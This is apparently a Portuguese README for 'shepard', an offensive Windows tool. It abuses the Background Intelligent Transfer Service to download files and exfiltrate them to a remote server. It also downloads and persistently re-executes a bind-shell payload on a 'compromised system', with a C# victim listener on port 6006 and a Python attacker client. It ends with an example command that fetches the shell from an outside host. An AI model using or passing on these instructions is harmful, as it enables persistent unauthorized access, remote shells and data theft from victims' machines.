
Ferramenta persistente de download/upload/execução em andamento usando o Windows BITS.
Esta é uma ferramenta de persistência que usa o Windows Background Intelligent Transfer Service (BITS).
Download de arquivos, Exfiltração de arquivos, Download de arquivos + Execução persistente
Execute shepard.exe como Administrador com os seguintes argumentos de linha de comando:
-d <remoteLocation> <writePath> : download de arquivo comum para um caminho local de sua escolha
-e <remoteLocation> <localPath> : upload de arquivo comum a partir de um caminho local de sua escolha (envia apenas para servidor IIS, esta é uma limitação do BITS)
-dr <remoteLocation> <writePath> [optionalFileArgs] : download de arquivo para um caminho de sua escolha e tentará manter a persistência. O arquivo baixado tentará executar com optionalFileArgs e o BITS verificará a cada 30 segundos para garantir que o arquivo ainda está em execução no sistema comprometido.
Executar este executável sem argumentos ou com uma quantidade incorreta de argumentos fará com que shepard saia de forma limpa.
O servidor (vítima) é escrito em C#. Ele escuta na porta 6006.
Execute shepardsbind_serv.exe sem argumentos.
O cliente (atacante) é escrito em Python e recebe um argumento: o endereço IP da máquina da vítima.
shepardsbind_recv.py <victim's IP>
Executar shepardsbind_recv.py sem argumentos retornará um erro.
O único executável que deve estar na máquina da vítima é o shepard.exe. Hospede o executável do bindshell de download em um local publicamente acessível. O Shepard baixará e executará o executável do bindshell, e o usuário agora pode usar o receptor python. Se o shell for encontrado e morto, ele reiniciará após 30 segundos.
Exemplo: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe